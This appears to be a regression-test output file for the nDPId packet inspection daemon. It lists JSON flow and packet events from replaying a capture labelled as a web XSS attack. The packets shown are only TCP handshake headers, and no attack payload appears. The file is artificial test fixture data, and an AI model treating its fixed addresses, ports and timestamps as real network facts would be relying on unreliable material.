+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347599663,"flow_last_seen":1499347604783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347731797,"flow_last_seen":1499347731797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347731797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1499347731797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347731797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84K9AAD4G5SCsEAABwKgKMuu2AFCGTjKNAAAAAKACchDmwwAAAgQFtAQCCAoBO9IiAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":2,"flow_last_seen":1499347731797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347731797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ67ZFR3+Dhk4yjqAScSB7XAAAAgQFtAQCCAoD5aOWATvSIgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6377,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":3,"flow_last_seen":1499347731798,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347731798,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04LBAAD4G5SesEAABwKgKMuu2AFCGTjKORUd\/hIAQAOUaZAAAAQEICgE70iID5aOW"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347733083,"flow_last_seen":1499347733083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347733083,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1499347733083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347733083,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/vJAAD4Gxt2sEAABwKgKMuvEAFCmnS2RAAAAAKACchDKIQAAAgQFtAQCCAoBO9NjAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":2,"flow_last_seen":1499347733083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347733083,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ68TrnH4qpp0tkqAScSC4ewAAAgQFtAQCCAoD5aTYATvTYwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6389,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":3,"flow_last_seen":1499347733084,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347733084,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/vNAAD4GxuSsEAABwKgKMuvEAFCmnS2S65x+K4AQAOVXgwAAAQEICgE702MD5aTY"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347734348,"flow_last_seen":1499347734348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347734348,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1499347734348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347734348,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gzpAAD4GQpasEAABwKgKMuvSAFDIKlelAAAAAKACchB9NgAAAgQFtAQCCAoBO9SfAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":2,"flow_last_seen":1499347734348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347734348,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ69JCAHRCyCpXpqAScSAd2QAAAgQFtAQCCAoD5aYUATvUnwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6398,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":3,"flow_last_seen":1499347734349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347734349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gztAAD4GQp2sEAABwKgKMuvSAFDIKlemQgB0Q4AQAOW83wAAAQEICgE71KAD5aYU"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347735664,"flow_last_seen":1499347735664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347735664,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6409,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1499347735664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347735664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QgpAAD4Gg8asEAABwKgKMuvgAFB2opfiAAAAAKACchCNKgAAAgQFtAQCCAoBO9XoAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":2,"flow_last_seen":1499347735664,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347735664,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6+DN1JXXdqKX46AScSB\/GgAAAgQFtAQCCAoD5addATvV6AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":3,"flow_last_seen":1499347735665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347735665,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QgtAAD4Gg82sEAABwKgKMuvgAFB2opfjzdSV2IAQAOUeIQAAAQEICgE71ekD5add"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6430,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347738229,"flow_last_seen":1499347738229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347738229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6430,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1499347738229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347738229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bexAAD4GV+SsEAABwKgKMuv6AFCQibWGAAAAAKACchBTAwAAAgQFtAQCCAoBO9hqAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6431,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":2,"flow_last_seen":1499347738229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347738229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6\/pIUQYXkIm1h6AScSBXtgAAAgQFtAQCCAoD5aneATvYagEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6432,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":3,"flow_last_seen":1499347738229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347738229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0be1AAD4GV+usEAABwKgKMuv6AFCQibWHSFEGGIAQAOX2vQAAAQEICgE72GoD5ane"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6442,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347739497,"flow_last_seen":1499347739497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347739497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6442,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1499347739497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347739497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XjZAAD4GZ5qsEAABwKgKMuwIAFCYkYeRAAAAAKACchB3pQAAAgQFtAQCCAoBO9mnAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6443,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":2,"flow_last_seen":1499347739497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347739497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7AiW6z+EmJGHkqAScSDzEwAAAgQFtAQCCAoD5asbATvZpwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":3,"flow_last_seen":1499347739498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347739498,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XjdAAD4GZ6GsEAABwKgKMuwIAFCYkYeSlus\/hYAQAOWSGwAAAQEICgE72acD5asb"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347740751,"flow_last_seen":1499347740751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740751,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1499347740751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347740751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8V35AAD4GblKsEAABwKgKMuwWAFBKCo2eAAAAAKACchC+2AAAAgQFtAQCCAoBO9rgAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6455,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":2,"flow_last_seen":1499347740751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347740751,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Bb1vAeUSgqNn6AScSASLAAAAgQFtAQCCAoD5axVATva4AEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6456,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":3,"flow_last_seen":1499347740752,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347740752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0V39AAD4GblmsEAABwKgKMuwWAFBKCo2f9bwHlYAQAOWxMwAAAQEICgE72uAD5axV"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347606078,"flow_last_seen":1499347611787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347606078,"flow_last_seen":1499347611787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347607344,"flow_last_seen":1499347612785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347607344,"flow_last_seen":1499347612785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347608596,"flow_last_seen":1499347613787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347608596,"flow_last_seen":1499347613787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59016,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347612465,"flow_last_seen":1499347617785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347613718,"flow_last_seen":1499347618787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59070,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499347547687,"flow_last_seen":1499347614979,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232682,"flow_avg_l4_payload_len":738,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347743331,"flow_last_seen":1499347743331,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347743331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1499347743331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iytAAD4GOqWsEAABwKgKMuwwAFCeqlZOAAAAAKACchCe6QAAAgQFtAQCCAoBO91lAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":2,"flow_last_seen":1499347743331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7DCbKjZEnqpWT6AScSAbmgAAAgQFtAQCCAoD5a7aATvdZQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6474,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":3,"flow_last_seen":1499347743332,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347743332,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iyxAAD4GOqysEAABwKgKMuwwAFCeqlZPmyo2RYAQAOW6oQAAAQEICgE73WUD5a7a"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347744595,"flow_last_seen":1499347744595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347744595,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1499347744595,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGtAAD4GPWWsEAABwKgKMuw+AFAw9lbKAAAAAKACchAK2AAAAgQFtAQCCAoBO96hAAAAAAEDAwc="} 